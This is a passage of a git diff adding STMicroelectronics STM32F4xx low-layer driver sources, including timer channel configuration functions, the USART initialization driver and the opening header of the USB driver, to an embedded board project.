tmpccmr2 = LL_TIM_ReadReg(TIMx, CCMR2); + + /* Reset Capture/Compare selection Bits */ + CLEAR_BIT(tmpccmr2, TIM_CCMR2_CC3S); + + /* Select the Output Compare Mode */ + MODIFY_REG(tmpccmr2, TIM_CCMR2_OC3M, TIM_OCInitStruct->OCMode); + + /* Set the Output Compare Polarity */ + MODIFY_REG(tmpccer, TIM_CCER_CC3P, TIM_OCInitStruct->OCPolarity << 8U); + + /* Set the Output State */ + MODIFY_REG(tmpccer, TIM_CCER_CC3E, TIM_OCInitStruct->OCState << 8U); + + if (IS_TIM_BREAK_INSTANCE(TIMx)) + { + assert_param(IS_LL_TIM_OCIDLESTATE(TIM_OCInitStruct->OCNIdleState)); + assert_param(IS_LL_TIM_OCIDLESTATE(TIM_OCInitStruct->OCIdleState)); + + /* Set the complementary output Polarity */ + MODIFY_REG(tmpccer, TIM_CCER_CC3NP, TIM_OCInitStruct->OCNPolarity << 10U); + + /* Set the complementary output State */ + MODIFY_REG(tmpccer, TIM_CCER_CC3NE, TIM_OCInitStruct->OCNState << 10U); + + /* Set the Output Idle state */ + MODIFY_REG(tmpcr2, TIM_CR2_OIS3, TIM_OCInitStruct->OCIdleState << 4U); + + /* Set the complementary output Idle state */ + MODIFY_REG(tmpcr2, TIM_CR2_OIS3N, TIM_OCInitStruct->OCNIdleState << 5U); + } + + /* Write to TIMx CR2 */ + LL_TIM_WriteReg(TIMx, CR2, tmpcr2); + + /* Write to TIMx CCMR2 */ + LL_TIM_WriteReg(TIMx, CCMR2, tmpccmr2); + + /* Set the Capture Compare Register value */ + LL_TIM_OC_SetCompareCH3(TIMx, TIM_OCInitStruct->CompareValue); + + /* Write to TIMx CCER */ + LL_TIM_WriteReg(TIMx, CCER, tmpccer); + + return SUCCESS; +} + +/** + * @brief Configure the TIMx output channel 4. + * @param TIMx Timer Instance + * @param TIM_OCInitStruct pointer to the the TIMx output channel 4 configuration data structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +static ErrorStatus OC4Config(TIM_TypeDef *TIMx, LL_TIM_OC_InitTypeDef *TIM_OCInitStruct) +{ + uint32_t tmpccmr2; + uint32_t tmpccer; + uint32_t tmpcr2; + + /* Check the parameters */ + assert_param(IS_TIM_CC4_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_OCMODE(TIM_OCInitStruct->OCMode)); + assert_param(IS_LL_TIM_OCSTATE(TIM_OCInitStruct->OCState)); + assert_param(IS_LL_TIM_OCPOLARITY(TIM_OCInitStruct->OCPolarity)); + assert_param(IS_LL_TIM_OCPOLARITY(TIM_OCInitStruct->OCNPolarity)); + assert_param(IS_LL_TIM_OCSTATE(TIM_OCInitStruct->OCNState)); + + /* Disable the Channel 4: Reset the CC4E Bit */ + CLEAR_BIT(TIMx->CCER, TIM_CCER_CC4E); + + /* Get the TIMx CCER register value */ + tmpccer = LL_TIM_ReadReg(TIMx, CCER); + + /* Get the TIMx CR2 register value */ + tmpcr2 = LL_TIM_ReadReg(TIMx, CR2); + + /* Get the TIMx CCMR2 register value */ + tmpccmr2 = LL_TIM_ReadReg(TIMx, CCMR2); + + /* Reset Capture/Compare selection Bits */ + CLEAR_BIT(tmpccmr2, TIM_CCMR2_CC4S); + + /* Select the Output Compare Mode */ + MODIFY_REG(tmpccmr2, TIM_CCMR2_OC4M, TIM_OCInitStruct->OCMode << 8U); + + /* Set the Output Compare Polarity */ + MODIFY_REG(tmpccer, TIM_CCER_CC4P, TIM_OCInitStruct->OCPolarity << 12U); + + /* Set the Output State */ + MODIFY_REG(tmpccer, TIM_CCER_CC4E, TIM_OCInitStruct->OCState << 12U); + + if (IS_TIM_BREAK_INSTANCE(TIMx)) + { + assert_param(IS_LL_TIM_OCIDLESTATE(TIM_OCInitStruct->OCNIdleState)); + assert_param(IS_LL_TIM_OCIDLESTATE(TIM_OCInitStruct->OCIdleState)); + + /* Set the Output Idle state */ + MODIFY_REG(tmpcr2, TIM_CR2_OIS4, TIM_OCInitStruct->OCIdleState << 6U); + } + + /* Write to TIMx CR2 */ + LL_TIM_WriteReg(TIMx, CR2, tmpcr2); + + /* Write to TIMx CCMR2 */ + LL_TIM_WriteReg(TIMx, CCMR2, tmpccmr2); + + /* Set the Capture Compare Register value */ + LL_TIM_OC_SetCompareCH4(TIMx, TIM_OCInitStruct->CompareValue); + + /* Write to TIMx CCER */ + LL_TIM_WriteReg(TIMx, CCER, tmpccer); + + return SUCCESS; +} + + +/** + * @brief Configure the TIMx input channel 1. + * @param TIMx Timer Instance + * @param TIM_ICInitStruct pointer to the the TIMx input channel 1 configuration data structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +static ErrorStatus IC1Config(TIM_TypeDef *TIMx, LL_TIM_IC_InitTypeDef *TIM_ICInitStruct) +{ + /* Check the parameters */ + assert_param(IS_TIM_CC1_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_IC_POLARITY(TIM_ICInitStruct->ICPolarity)); + assert_param(IS_LL_TIM_ACTIVEINPUT(TIM_ICInitStruct->ICActiveInput)); + assert_param(IS_LL_TIM_ICPSC(TIM_ICInitStruct->ICPrescaler)); + assert_param(IS_LL_TIM_IC_FILTER(TIM_ICInitStruct->ICFilter)); + + /* Disable the Channel 1: Reset the CC1E Bit */ + TIMx->CCER &= (uint32_t)~TIM_CCER_CC1E; + + /* Select the Input and set the filter and the prescaler value */ + MODIFY_REG(TIMx->CCMR1, + (TIM_CCMR1_CC1S | TIM_CCMR1_IC1F | TIM_CCMR1_IC1PSC), + (TIM_ICInitStruct->ICActiveInput | TIM_ICInitStruct->ICFilter | TIM_ICInitStruct->ICPrescaler) >> 16U); + + /* Select the Polarity and set the CC1E Bit */ + MODIFY_REG(TIMx->CCER, + (TIM_CCER_CC1P | TIM_CCER_CC1NP), + (TIM_ICInitStruct->ICPolarity | TIM_CCER_CC1E)); + + return SUCCESS; +} + +/** + * @brief Configure the TIMx input channel 2. + * @param TIMx Timer Instance + * @param TIM_ICInitStruct pointer to the the TIMx input channel 2 configuration data structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +static ErrorStatus IC2Config(TIM_TypeDef *TIMx, LL_TIM_IC_InitTypeDef *TIM_ICInitStruct) +{ + /* Check the parameters */ + assert_param(IS_TIM_CC2_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_IC_POLARITY(TIM_ICInitStruct->ICPolarity)); + assert_param(IS_LL_TIM_ACTIVEINPUT(TIM_ICInitStruct->ICActiveInput)); + assert_param(IS_LL_TIM_ICPSC(TIM_ICInitStruct->ICPrescaler)); + assert_param(IS_LL_TIM_IC_FILTER(TIM_ICInitStruct->ICFilter)); + + /* Disable the Channel 2: Reset the CC2E Bit */ + TIMx->CCER &= (uint32_t)~TIM_CCER_CC2E; + + /* Select the Input and set the filter and the prescaler value */ + MODIFY_REG(TIMx->CCMR1, + (TIM_CCMR1_CC2S | TIM_CCMR1_IC2F | TIM_CCMR1_IC2PSC), + (TIM_ICInitStruct->ICActiveInput | TIM_ICInitStruct->ICFilter | TIM_ICInitStruct->ICPrescaler) >> 8U); + + /* Select the Polarity and set the CC2E Bit */ + MODIFY_REG(TIMx->CCER, + (TIM_CCER_CC2P | TIM_CCER_CC2NP), + ((TIM_ICInitStruct->ICPolarity << 4U) | TIM_CCER_CC2E)); + + return SUCCESS; +} + +/** + * @brief Configure the TIMx input channel 3. + * @param TIMx Timer Instance + * @param TIM_ICInitStruct pointer to the the TIMx input channel 3 configuration data structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +static ErrorStatus IC3Config(TIM_TypeDef *TIMx, LL_TIM_IC_InitTypeDef *TIM_ICInitStruct) +{ + /* Check the parameters */ + assert_param(IS_TIM_CC3_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_IC_POLARITY(TIM_ICInitStruct->ICPolarity)); + assert_param(IS_LL_TIM_ACTIVEINPUT(TIM_ICInitStruct->ICActiveInput)); + assert_param(IS_LL_TIM_ICPSC(TIM_ICInitStruct->ICPrescaler)); + assert_param(IS_LL_TIM_IC_FILTER(TIM_ICInitStruct->ICFilter)); + + /* Disable the Channel 3: Reset the CC3E Bit */ + TIMx->CCER &= (uint32_t)~TIM_CCER_CC3E; + + /* Select the Input and set the filter and the prescaler value */ + MODIFY_REG(TIMx->CCMR2, + (TIM_CCMR2_CC3S | TIM_CCMR2_IC3F | TIM_CCMR2_IC3PSC), + (TIM_ICInitStruct->ICActiveInput | TIM_ICInitStruct->ICFilter | TIM_ICInitStruct->ICPrescaler) >> 16U); + + /* Select the Polarity and set the CC3E Bit */ + MODIFY_REG(TIMx->CCER, + (TIM_CCER_CC3P | TIM_CCER_CC3NP), + ((TIM_ICInitStruct->ICPolarity << 8U) | TIM_CCER_CC3E)); + + return SUCCESS; +} + +/** + * @brief Configure the TIMx input channel 4. + * @param TIMx Timer Instance + * @param TIM_ICInitStruct pointer to the the TIMx input channel 4 configuration data structure + * @retval An ErrorStatus enumeration value: + * - SUCCESS: TIMx registers are de-initialized + * - ERROR: not applicable + */ +static ErrorStatus IC4Config(TIM_TypeDef *TIMx, LL_TIM_IC_InitTypeDef *TIM_ICInitStruct) +{ + /* Check the parameters */ + assert_param(IS_TIM_CC4_INSTANCE(TIMx)); + assert_param(IS_LL_TIM_IC_POLARITY(TIM_ICInitStruct->ICPolarity)); + assert_param(IS_LL_TIM_ACTIVEINPUT(TIM_ICInitStruct->ICActiveInput)); + assert_param(IS_LL_TIM_ICPSC(TIM_ICInitStruct->ICPrescaler)); + assert_param(IS_LL_TIM_IC_FILTER(TIM_ICInitStruct->ICFilter)); + + /* Disable the Channel 4: Reset the CC4E Bit */ + TIMx->CCER &= (uint32_t)~TIM_CCER_CC4E; + + /* Select the Input and set the filter and the prescaler value */ + MODIFY_REG(TIMx->CCMR2, + (TIM_CCMR2_CC4S | TIM_CCMR2_IC4F | TIM_CCMR2_IC4PSC), + (TIM_ICInitStruct->ICActiveInput | TIM_ICInitStruct->ICFilter | TIM_ICInitStruct->ICPrescaler) >> 8U); + + /* Select the Polarity and set the CC2E Bit */ + MODIFY_REG(TIMx->CCER, + (TIM_CCER_CC4P | TIM_CCER_CC4NP), + ((TIM_ICInitStruct->ICPolarity << 12U) | TIM_CCER_CC4E)); + + return SUCCESS; +} + + +/** + * @} + */ + +/** + * @} + */ + +#endif /* TIM1 || TIM2 || TIM3 || TIM4 || TIM5 || TIM6 || TIM7 || TIM8 || TIM9 || TIM10 || TIM11 || TIM12 || TIM13 || TIM14 */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_usart.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_usart.c new file mode 100644 index 000000000..150d8bbf6 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_usart.c @@ -0,0 +1,502 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_usart.c + * @author MCD Application Team + * @brief USART LL module driver. + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +#if defined(USE_FULL_LL_DRIVER) + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_ll_usart.h" +#include "stm32f4xx_ll_rcc.h" +#include "stm32f4xx_ll_bus.h" +#ifdef USE_FULL_ASSERT +#include "stm32_assert.h" +#else +#define assert_param(expr) ((void)0U) +#endif + +/** @addtogroup STM32F4xx_LL_Driver + * @{ + */ + +#if defined (USART1) || defined (USART2) || defined (USART3) || defined (USART6) || defined (UART4) || defined (UART5) || defined (UART7) || defined (UART8) || defined (UART9) || defined (UART10) + +/** @addtogroup USART_LL + * @{ + */ + +/* Private types -------------------------------------------------------------*/ +/* Private variables ---------------------------------------------------------*/ +/* Private constants ---------------------------------------------------------*/ +/** @addtogroup USART_LL_Private_Constants + * @{ + */ + +/** + * @} + */ + + +/* Private macros ------------------------------------------------------------*/ +/** @addtogroup USART_LL_Private_Macros + * @{ + */ + +/* __BAUDRATE__ The maximum Baud Rate is derived from the maximum clock available + * divided by the smallest oversampling used on the USART (i.e. 8) */ +#define IS_LL_USART_BAUDRATE(__BAUDRATE__) ((__BAUDRATE__) <= 12500000U) + +/* __VALUE__ In case of oversampling by 16 and 8, BRR content must be greater than or equal to 16d. */ +#define IS_LL_USART_BRR_MIN(__VALUE__) ((__VALUE__) >= 16U) + +#define IS_LL_USART_DIRECTION(__VALUE__) (((__VALUE__) == LL_USART_DIRECTION_NONE) \ + || ((__VALUE__) == LL_USART_DIRECTION_RX) \ + || ((__VALUE__) == LL_USART_DIRECTION_TX) \ + || ((__VALUE__) == LL_USART_DIRECTION_TX_RX)) + +#define IS_LL_USART_PARITY(__VALUE__) (((__VALUE__) == LL_USART_PARITY_NONE) \ + || ((__VALUE__) == LL_USART_PARITY_EVEN) \ + || ((__VALUE__) == LL_USART_PARITY_ODD)) + +#define IS_LL_USART_DATAWIDTH(__VALUE__) (((__VALUE__) == LL_USART_DATAWIDTH_8B) \ + || ((__VALUE__) == LL_USART_DATAWIDTH_9B)) + +#define IS_LL_USART_OVERSAMPLING(__VALUE__) (((__VALUE__) == LL_USART_OVERSAMPLING_16) \ + || ((__VALUE__) == LL_USART_OVERSAMPLING_8)) + +#define IS_LL_USART_LASTBITCLKOUTPUT(__VALUE__) (((__VALUE__) == LL_USART_LASTCLKPULSE_NO_OUTPUT) \ + || ((__VALUE__) == LL_USART_LASTCLKPULSE_OUTPUT)) + +#define IS_LL_USART_CLOCKPHASE(__VALUE__) (((__VALUE__) == LL_USART_PHASE_1EDGE) \ + || ((__VALUE__) == LL_USART_PHASE_2EDGE)) + +#define IS_LL_USART_CLOCKPOLARITY(__VALUE__) (((__VALUE__) == LL_USART_POLARITY_LOW) \ + || ((__VALUE__) == LL_USART_POLARITY_HIGH)) + +#define IS_LL_USART_CLOCKOUTPUT(__VALUE__) (((__VALUE__) == LL_USART_CLOCK_DISABLE) \ + || ((__VALUE__) == LL_USART_CLOCK_ENABLE)) + +#define IS_LL_USART_STOPBITS(__VALUE__) (((__VALUE__) == LL_USART_STOPBITS_0_5) \ + || ((__VALUE__) == LL_USART_STOPBITS_1) \ + || ((__VALUE__) == LL_USART_STOPBITS_1_5) \ + || ((__VALUE__) == LL_USART_STOPBITS_2)) + +#define IS_LL_USART_HWCONTROL(__VALUE__) (((__VALUE__) == LL_USART_HWCONTROL_NONE) \ + || ((__VALUE__) == LL_USART_HWCONTROL_RTS) \ + || ((__VALUE__) == LL_USART_HWCONTROL_CTS) \ + || ((__VALUE__) == LL_USART_HWCONTROL_RTS_CTS)) + +/** + * @} + */ + +/* Private function prototypes -----------------------------------------------*/ + +/* Exported functions --------------------------------------------------------*/ +/** @addtogroup USART_LL_Exported_Functions + * @{ + */ + +/** @addtogroup USART_LL_EF_Init + * @{ + */ + +/** + * @brief De-initialize USART registers (Registers restored to their default values). + * @param USARTx USART Instance + * @retval An ErrorStatus enumeration value: + * - SUCCESS: USART registers are de-initialized + * - ERROR: USART registers are not de-initialized + */ +ErrorStatus LL_USART_DeInit(USART_TypeDef *USARTx) +{ + ErrorStatus status = SUCCESS; + + /* Check the parameters */ + assert_param(IS_UART_INSTANCE(USARTx)); + + if (USARTx == USART1) + { + /* Force reset of USART clock */ + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_USART1); + + /* Release reset of USART clock */ + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_USART1); + } + else if (USARTx == USART2) + { + /* Force reset of USART clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_USART2); + + /* Release reset of USART clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_USART2); + } +#if defined(USART3) + else if (USARTx == USART3) + { + /* Force reset of USART clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_USART3); + + /* Release reset of USART clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_USART3); + } +#endif /* USART3 */ +#if defined(USART6) + else if (USARTx == USART6) + { + /* Force reset of USART clock */ + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_USART6); + + /* Release reset of USART clock */ + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_USART6); + } +#endif /* USART6 */ +#if defined(UART4) + else if (USARTx == UART4) + { + /* Force reset of UART clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_UART4); + + /* Release reset of UART clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_UART4); + } +#endif /* UART4 */ +#if defined(UART5) + else if (USARTx == UART5) + { + /* Force reset of UART clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_UART5); + + /* Release reset of UART clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_UART5); + } +#endif /* UART5 */ +#if defined(UART7) + else if (USARTx == UART7) + { + /* Force reset of UART clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_UART7); + + /* Release reset of UART clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_UART7); + } +#endif /* UART7 */ +#if defined(UART8) + else if (USARTx == UART8) + { + /* Force reset of UART clock */ + LL_APB1_GRP1_ForceReset(LL_APB1_GRP1_PERIPH_UART8); + + /* Release reset of UART clock */ + LL_APB1_GRP1_ReleaseReset(LL_APB1_GRP1_PERIPH_UART8); + } +#endif /* UART8 */ +#if defined(UART9) + else if (USARTx == UART9) + { + /* Force reset of UART clock */ + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_UART9); + + /* Release reset of UART clock */ + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_UART9); + } +#endif /* UART9 */ +#if defined(UART10) + else if (USARTx == UART10) + { + /* Force reset of UART clock */ + LL_APB2_GRP1_ForceReset(LL_APB2_GRP1_PERIPH_UART10); + + /* Release reset of UART clock */ + LL_APB2_GRP1_ReleaseReset(LL_APB2_GRP1_PERIPH_UART10); + } +#endif /* UART10 */ + else + { + status = ERROR; + } + + return (status); +} + +/** + * @brief Initialize USART registers according to the specified + * parameters in USART_InitStruct. + * @note As some bits in USART configuration registers can only be written when the USART is disabled (USART_CR1_UE bit =0), + * USART IP should be in disabled state prior calling this function. Otherwise, ERROR result will be returned. + * @note Baud rate value stored in USART_InitStruct BaudRate field, should be valid (different from 0). + * @param USARTx USART Instance + * @param USART_InitStruct pointer to a LL_USART_InitTypeDef structure + * that contains the configuration information for the specified USART peripheral. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: USART registers are initialized according to USART_InitStruct content + * - ERROR: Problem occurred during USART Registers initialization + */ +ErrorStatus LL_USART_Init(USART_TypeDef *USARTx, LL_USART_InitTypeDef *USART_InitStruct) +{ + ErrorStatus status = ERROR; + uint32_t periphclk = LL_RCC_PERIPH_FREQUENCY_NO; + LL_RCC_ClocksTypeDef rcc_clocks; + + /* Check the parameters */ + assert_param(IS_UART_INSTANCE(USARTx)); + assert_param(IS_LL_USART_BAUDRATE(USART_InitStruct->BaudRate)); + assert_param(IS_LL_USART_DATAWIDTH(USART_InitStruct->DataWidth)); + assert_param(IS_LL_USART_STOPBITS(USART_InitStruct->StopBits)); + assert_param(IS_LL_USART_PARITY(USART_InitStruct->Parity)); + assert_param(IS_LL_USART_DIRECTION(USART_InitStruct->TransferDirection)); + assert_param(IS_LL_USART_HWCONTROL(USART_InitStruct->HardwareFlowControl)); + assert_param(IS_LL_USART_OVERSAMPLING(USART_InitStruct->OverSampling)); + + /* USART needs to be in disabled state, in order to be able to configure some bits in + CRx registers */ + if (LL_USART_IsEnabled(USARTx) == 0U) + { + /*---------------------------- USART CR1 Configuration ----------------------- + * Configure USARTx CR1 (USART Word Length, Parity, Mode and Oversampling bits) with parameters: + * - DataWidth: USART_CR1_M bits according to USART_InitStruct->DataWidth value + * - Parity: USART_CR1_PCE, USART_CR1_PS bits according to USART_InitStruct->Parity value + * - TransferDirection: USART_CR1_TE, USART_CR1_RE bits according to USART_InitStruct->TransferDirection value + * - Oversampling: USART_CR1_OVER8 bit according to USART_InitStruct->OverSampling value. + */ + MODIFY_REG(USARTx->CR1, + (USART_CR1_M | USART_CR1_PCE | USART_CR1_PS | + USART_CR1_TE | USART_CR1_RE | USART_CR1_OVER8), + (USART_InitStruct->DataWidth | USART_InitStruct->Parity | + USART_InitStruct->TransferDirection | USART_InitStruct->OverSampling)); + + /*---------------------------- USART CR2 Configuration ----------------------- + * Configure USARTx CR2 (Stop bits) with parameters: + * - Stop Bits: USART_CR2_STOP bits according to USART_InitStruct->StopBits value. + * - CLKEN, CPOL, CPHA and LBCL bits are to be configured using LL_USART_ClockInit(). + */ + LL_USART_SetStopBitsLength(USARTx, USART_InitStruct->StopBits); + + /*---------------------------- USART CR3 Configuration ----------------------- + * Configure USARTx CR3 (Hardware Flow Control) with parameters: + * - HardwareFlowControl: USART_CR3_RTSE, USART_CR3_CTSE bits according to USART_InitStruct->HardwareFlowControl value. + */ + LL_USART_SetHWFlowCtrl(USARTx, USART_InitStruct->HardwareFlowControl); + + /*---------------------------- USART BRR Configuration ----------------------- + * Retrieve Clock frequency used for USART Peripheral + */ + LL_RCC_GetSystemClocksFreq(&rcc_clocks); + if (USARTx == USART1) + { + periphclk = rcc_clocks.PCLK2_Frequency; + } + else if (USARTx == USART2) + { + periphclk = rcc_clocks.PCLK1_Frequency; + } +#if defined(USART3) + else if (USARTx == USART3) + { + periphclk = rcc_clocks.PCLK1_Frequency; + } +#endif /* USART3 */ +#if defined(USART6) + else if (USARTx == USART6) + { + periphclk = rcc_clocks.PCLK2_Frequency; + } +#endif /* USART6 */ +#if defined(UART4) + else if (USARTx == UART4) + { + periphclk = rcc_clocks.PCLK1_Frequency; + } +#endif /* UART4 */ +#if defined(UART5) + else if (USARTx == UART5) + { + periphclk = rcc_clocks.PCLK1_Frequency; + } +#endif /* UART5 */ +#if defined(UART7) + else if (USARTx == UART7) + { + periphclk = rcc_clocks.PCLK1_Frequency; + } +#endif /* UART7 */ +#if defined(UART8) + else if (USARTx == UART8) + { + periphclk = rcc_clocks.PCLK1_Frequency; + } +#endif /* UART8 */ +#if defined(UART9) + else if (USARTx == UART9) + { + periphclk = rcc_clocks.PCLK2_Frequency; + } +#endif /* UART9 */ +#if defined(UART10) + else if (USARTx == UART10) + { + periphclk = rcc_clocks.PCLK2_Frequency; + } +#endif /* UART10 */ + else + { + /* Nothing to do, as error code is already assigned to ERROR value */ + } + + /* Configure the USART Baud Rate : + - valid baud rate value (different from 0) is required + - Peripheral clock as returned by RCC service, should be valid (different from 0). + */ + if ((periphclk != LL_RCC_PERIPH_FREQUENCY_NO) + && (USART_InitStruct->BaudRate != 0U)) + { + status = SUCCESS; + LL_USART_SetBaudRate(USARTx, + periphclk, + USART_InitStruct->OverSampling, + USART_InitStruct->BaudRate); + + /* Check BRR is greater than or equal to 16d */ + assert_param(IS_LL_USART_BRR_MIN(USARTx->BRR)); + } + } + /* Endif (=> USART not in Disabled state => return ERROR) */ + + return (status); +} + +/** + * @brief Set each @ref LL_USART_InitTypeDef field to default value. + * @param USART_InitStruct Pointer to a @ref LL_USART_InitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ + +void LL_USART_StructInit(LL_USART_InitTypeDef *USART_InitStruct) +{ + /* Set USART_InitStruct fields to default values */ + USART_InitStruct->BaudRate = 9600U; + USART_InitStruct->DataWidth = LL_USART_DATAWIDTH_8B; + USART_InitStruct->StopBits = LL_USART_STOPBITS_1; + USART_InitStruct->Parity = LL_USART_PARITY_NONE ; + USART_InitStruct->TransferDirection = LL_USART_DIRECTION_TX_RX; + USART_InitStruct->HardwareFlowControl = LL_USART_HWCONTROL_NONE; + USART_InitStruct->OverSampling = LL_USART_OVERSAMPLING_16; +} + +/** + * @brief Initialize USART Clock related settings according to the + * specified parameters in the USART_ClockInitStruct. + * @note As some bits in USART configuration registers can only be written when the USART is disabled (USART_CR1_UE bit =0), + * USART IP should be in disabled state prior calling this function. Otherwise, ERROR result will be returned. + * @param USARTx USART Instance + * @param USART_ClockInitStruct Pointer to a @ref LL_USART_ClockInitTypeDef structure + * that contains the Clock configuration information for the specified USART peripheral. + * @retval An ErrorStatus enumeration value: + * - SUCCESS: USART registers related to Clock settings are initialized according to USART_ClockInitStruct content + * - ERROR: Problem occurred during USART Registers initialization + */ +ErrorStatus LL_USART_ClockInit(USART_TypeDef *USARTx, LL_USART_ClockInitTypeDef *USART_ClockInitStruct) +{ + ErrorStatus status = SUCCESS; + + /* Check USART Instance and Clock signal output parameters */ + assert_param(IS_UART_INSTANCE(USARTx)); + assert_param(IS_LL_USART_CLOCKOUTPUT(USART_ClockInitStruct->ClockOutput)); + + /* USART needs to be in disabled state, in order to be able to configure some bits in + CRx registers */ + if (LL_USART_IsEnabled(USARTx) == 0U) + { + /*---------------------------- USART CR2 Configuration -----------------------*/ + /* If Clock signal has to be output */ + if (USART_ClockInitStruct->ClockOutput == LL_USART_CLOCK_DISABLE) + { + /* Deactivate Clock signal delivery : + * - Disable Clock Output: USART_CR2_CLKEN cleared + */ + LL_USART_DisableSCLKOutput(USARTx); + } + else + { + /* Ensure USART instance is USART capable */ + assert_param(IS_USART_INSTANCE(USARTx)); + + /* Check clock related parameters */ + assert_param(IS_LL_USART_CLOCKPOLARITY(USART_ClockInitStruct->ClockPolarity)); + assert_param(IS_LL_USART_CLOCKPHASE(USART_ClockInitStruct->ClockPhase)); + assert_param(IS_LL_USART_LASTBITCLKOUTPUT(USART_ClockInitStruct->LastBitClockPulse)); + + /*---------------------------- USART CR2 Configuration ----------------------- + * Configure USARTx CR2 (Clock signal related bits) with parameters: + * - Enable Clock Output: USART_CR2_CLKEN set + * - Clock Polarity: USART_CR2_CPOL bit according to USART_ClockInitStruct->ClockPolarity value + * - Clock Phase: USART_CR2_CPHA bit according to USART_ClockInitStruct->ClockPhase value + * - Last Bit Clock Pulse Output: USART_CR2_LBCL bit according to USART_ClockInitStruct->LastBitClockPulse value. + */ + MODIFY_REG(USARTx->CR2, + USART_CR2_CLKEN | USART_CR2_CPHA | USART_CR2_CPOL | USART_CR2_LBCL, + USART_CR2_CLKEN | USART_ClockInitStruct->ClockPolarity | + USART_ClockInitStruct->ClockPhase | USART_ClockInitStruct->LastBitClockPulse); + } + } + /* Else (USART not in Disabled state => return ERROR */ + else + { + status = ERROR; + } + + return (status); +} + +/** + * @brief Set each field of a @ref LL_USART_ClockInitTypeDef type structure to default value. + * @param USART_ClockInitStruct Pointer to a @ref LL_USART_ClockInitTypeDef structure + * whose fields will be set to default values. + * @retval None + */ +void LL_USART_ClockStructInit(LL_USART_ClockInitTypeDef *USART_ClockInitStruct) +{ + /* Set LL_USART_ClockInitStruct fields with default values */ + USART_ClockInitStruct->ClockOutput = LL_USART_CLOCK_DISABLE; + USART_ClockInitStruct->ClockPolarity = LL_USART_POLARITY_LOW; /* Not relevant when ClockOutput = LL_USART_CLOCK_DISABLE */ + USART_ClockInitStruct->ClockPhase = LL_USART_PHASE_1EDGE; /* Not relevant when ClockOutput = LL_USART_CLOCK_DISABLE */ + USART_ClockInitStruct->LastBitClockPulse = LL_USART_LASTCLKPULSE_NO_OUTPUT; /* Not relevant when ClockOutput = LL_USART_CLOCK_DISABLE */ +} + +/** + * @} + */ + +/** + * @} + */ + +/** + * @} + */ + +#endif /* USART1 || USART2 || USART3 || USART6 || UART4 || UART5 || UART7 || UART8 || UART9 || UART10 */ + +/** + * @} + */ + +#endif /* USE_FULL_LL_DRIVER */ + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ + diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_usb.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_usb.c new file mode 100644 index 000000000..cdd837da2 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_ll_usb.c @@ -0,0 +1,2106 @@ +/** + ****************************************************************************** + * @file stm32f4xx_ll_usb.c + * @author MCD Application Team + * @brief USB Low Layer HAL module driver. + * + * This file provides firmware functions to manage the following + * functionalities of the USB Peripheral Controller: + * + Initialization/de-initialization functions + * + I/O operation functions + * + Peripheral Control functions + * + Peripheral State functions + * + @verbatim + ============================================================================== + ##### How to use this driver ##### + ============================================================================== + [..] + (#) Fill parameters of Init structure in USB_OTG_CfgTypeDef structure. + + (#) Call USB_CoreInit() API to initialize the USB Core peripheral. + + (#) The upper HAL HCD/PCD driver will call the right routines for its internal processes. + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

